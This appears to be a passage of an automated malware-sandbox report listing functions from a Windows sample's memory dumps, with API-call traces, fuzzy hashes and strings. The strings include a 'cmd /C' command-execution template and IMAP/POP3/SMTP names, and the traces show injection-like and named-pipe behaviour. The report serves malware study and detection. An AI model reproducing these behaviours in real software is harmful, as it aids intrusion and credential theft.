    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7422, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 102 Total matches: 8processstring
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
